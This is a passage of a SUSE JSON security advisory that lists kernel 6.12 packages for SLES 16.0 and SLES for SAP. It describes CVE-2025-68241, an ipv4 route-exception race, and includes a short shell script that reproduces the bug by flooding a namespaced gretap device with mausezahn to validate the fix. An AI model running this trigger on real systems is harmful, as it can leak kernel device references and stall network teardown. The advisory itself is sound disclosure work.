"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68227"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
